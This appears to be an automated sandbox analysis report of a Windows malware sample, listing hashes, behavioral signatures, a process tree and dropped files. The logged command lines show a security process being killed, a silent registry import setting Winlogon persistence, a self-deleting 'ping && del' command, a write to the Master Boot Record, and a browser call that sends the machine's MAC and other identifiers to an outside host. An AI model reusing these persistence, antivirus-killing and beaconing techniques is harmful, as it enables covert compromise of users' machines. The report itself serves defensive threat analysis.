Analysis
-
max time kernel
170s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2022, 11:21
Static task
static1
Behavioral task
behavioral1
Sample
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
Resource
win10v2004-20220812-en
General
-
Target
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe
-
Size
208KB
-
MD5
1690e0408b941cfe9f8d8ffe46bb9481
-
SHA1
03d3a9c8e5bff263caa06c4795bd4dca2d1561c7
-
SHA256
d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190
-
SHA512
02a272ca995f123df7becf79b4b3a17b11f5fbcfbcac070c001d20b79a07035cdc99b10a72554728591b6370e3eedb58649dc4fff102322fc2fa06ecb67d6bc6
-
SSDEEP
6144:jZA/L880NEJji+5rqqULirD2Ei/NjO50p8I4cC:je/L880NEJjBdrm/fGI4D
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\SysWOW64\\3682\\8qcnzghu.exe" regedit.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" io5v11ce.exe -
Executes dropped EXE 2 IoCs
pid Process 32 takesoft.exe 864 io5v11ce.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\3682\3.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\8.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\9.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File created C:\Windows\SysWOW64\3682\test.reg takesoft.exe File opened for modification C:\Windows\SysWOW64\3682\io5v11ce.exe takesoft.exe File opened for modification C:\Windows\SysWOW64\3682\io5v11ce.exe io5v11ce.exe File opened for modification C:\Windows\SysWOW64\3682\2.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\6.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\7.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\4.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\10.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\dasoft.encode d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\takesoft.exe takesoft.exe File opened for modification C:\Windows\SysWOW64\3682\takesoft.exe d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\5.ico d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe File opened for modification C:\Windows\SysWOW64\3682\dasoft.encode takesoft.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 4188 taskkill.exe 636 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A25E3B2C-384D-11ED-B696-5203DB9D3E0F} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open io5v11ce.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open\command io5v11ce.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell\open\command\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE http://www.6701.com/?G04" io5v11ce.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE,0" io5v11ce.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.IE io5v11ce.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.IE\ = "IE" io5v11ce.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE io5v11ce.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IE\ = "????" io5v11ce.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\shell io5v11ce.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IE\DefaultIcon io5v11ce.exe -
Runs .reg file with regedit 1 IoCs
pid Process 3468 regedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1444 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 32 takesoft.exe 32 takesoft.exe 864 io5v11ce.exe 864 io5v11ce.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 636 taskkill.exe Token: SeDebugPrivilege 32 takesoft.exe Token: SeDebugPrivilege 864 io5v11ce.exe Token: SeDebugPrivilege 4188 taskkill.exe Token: SeDebugPrivilege 864 io5v11ce.exe Token: SeDebugPrivilege 864 io5v11ce.exe Token: SeDebugPrivilege 864 io5v11ce.exe Token: SeDebugPrivilege 864 io5v11ce.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5084 iexplore.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 5084 iexplore.exe 5084 iexplore.exe 1624 IEXPLORE.EXE 1624 IEXPLORE.EXE 32 takesoft.exe 864 io5v11ce.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 4628 wrote to memory of 636 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 80 PID 4628 wrote to memory of 636 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 80 PID 4628 wrote to memory of 636 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 80 PID 4628 wrote to memory of 5084 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 82 PID 4628 wrote to memory of 5084 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 82 PID 5084 wrote to memory of 1624 5084 iexplore.exe 83 PID 5084 wrote to memory of 1624 5084 iexplore.exe 83 PID 5084 wrote to memory of 1624 5084 iexplore.exe 83 PID 4628 wrote to memory of 32 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 87 PID 4628 wrote to memory of 32 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 87 PID 4628 wrote to memory of 32 4628 d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe 87 PID 32 wrote to memory of 3896 32 takesoft.exe 88 PID 32 wrote to memory of 3896 32 takesoft.exe 88 PID 32 wrote to memory of 3896 32 takesoft.exe 88 PID 32 wrote to memory of 864 32 takesoft.exe 89 PID 32 wrote to memory of 864 32 takesoft.exe 89 PID 32 wrote to memory of 864 32 takesoft.exe 89 PID 864 wrote to memory of 4188 864 io5v11ce.exe 91 PID 864 wrote to memory of 4188 864 io5v11ce.exe 91 PID 864 wrote to memory of 4188 864 io5v11ce.exe 91 PID 3896 wrote to memory of 3468 3896 cmd.exe 92 PID 3896 wrote to memory of 3468 3896 cmd.exe 92 PID 3896 wrote to memory of 3468 3896 cmd.exe 92 PID 864 wrote to memory of 1004 864 io5v11ce.exe 94 PID 864 wrote to memory of 1004 864 io5v11ce.exe 94 PID 864 wrote to memory of 1004 864 io5v11ce.exe 94 PID 1004 wrote to memory of 1444 1004 cmd.exe 97 PID 1004 wrote to memory of 1444 1004 cmd.exe 97 PID 1004 wrote to memory of 1444 1004 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe"1⤵
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ZhuDongFangyu.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.baigezi.com/shenjingyuan/get.asp?mac=5203DB9D3EF&makedate=QM00013&comput=Home&ver=79&userid=00012⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5084 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1624
-
-
-
C:\Windows\SysWOW64\3682\takesoft.exeC:\Windows\system32\3682\takesoft.exe C:\Users\Admin\AppData\Local\Temp\d48f9b157d7e4e9601ba7dd59655e05945eb2fe70da09e86fad8567c6c515190.exe===2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Windows\SysWOW64\3682\test.reg"3⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Windows\SysWOW64\3682\test.reg"4⤵
- Modifies WinLogon for persistence
- Runs .reg file with regedit
PID:3468
-
-
-
C:\Windows\SysWOW64\3682\io5v11ce.exeC:\Windows\SysWOW64\3682\io5v11ce.exe3⤵
- Modifies visibility of file extensions in Explorer
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ZhuDongFangyu.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 1 && del "C:\Windows\SysWOW64\3682\io5v11ce.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 15⤵
- Runs ping.exe
PID:1444
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD5cc52b4148c16a0e8158ef3e8ddbec04d
SHA1217645a0d99809fbef89a6e1a2864ec3271aa21d
SHA25625be46d9c91c13105ccbe57c88c50dd2a8618e1edd94d02305c0128ed3e947c6
SHA51272fc6ef224cd198fda822a5e65859921faac90d30eb5503e00593f4d7c964696d5bc6a538a36b005be78e72466ccb6b2792969bc3ff776ba25e48ef19eed3830
-
Filesize
21KB
MD5fda95ce112398a6472a4b0b28a67258c
SHA12f30086207b0ac0395830c529f2cecd05f867706
SHA256b1682151ee4fbab8c581da5cef36ae621670f00414fad7e254fb3573a0cce2d8
SHA5129adaec5a396dae16a01c5595212093428d633394e39fde48b099f6180ca0ce7e4599c3edc4f3b1bb68364f6f908030794bf7b5470cef168ab92dee22e2d7072b
-
Filesize
21KB
MD5fda95ce112398a6472a4b0b28a67258c
SHA12f30086207b0ac0395830c529f2cecd05f867706
SHA256b1682151ee4fbab8c581da5cef36ae621670f00414fad7e254fb3573a0cce2d8
SHA5129adaec5a396dae16a01c5595212093428d633394e39fde48b099f6180ca0ce7e4599c3edc4f3b1bb68364f6f908030794bf7b5470cef168ab92dee22e2d7072b
-
Filesize
12KB
MD5a5241366618c5617785aeffa02fd0586
SHA1dac0682ec1f9eebcefedca0d0b81052f4e45a889
SHA256898260e02a4348b63aa13ccfd293449fec88f158a08a4c000f3f5b31953115c4
SHA51291d1e7026e3f525ed029bc556485b7a845968e074df5871e19c4312c5390298203ffd9e8d5e57aa27e9eba083f3d6be459e4826cbd92c1b0d9b2147f044fe2f8
-
Filesize
12KB
MD5a5241366618c5617785aeffa02fd0586
SHA1dac0682ec1f9eebcefedca0d0b81052f4e45a889
SHA256898260e02a4348b63aa13ccfd293449fec88f158a08a4c000f3f5b31953115c4
SHA51291d1e7026e3f525ed029bc556485b7a845968e074df5871e19c4312c5390298203ffd9e8d5e57aa27e9eba083f3d6be459e4826cbd92c1b0d9b2147f044fe2f8
-
Filesize
206B
MD5aafbc515e56620a59332edb997355b08
SHA1c3927a56cf76eb7e4005c64393945349c9920c7e
SHA256adc1b5de2e1f76368949fc90372c25d0ce06a60f63100a264d1b3c623ff7e69b
SHA512a574404eaa573231163bef3424cccb5aee52539c4b8d4c4896dd2e6808a35159dd69e96dd135743ed83589af34bc701fe615e8925967cd81dce7a47d59392254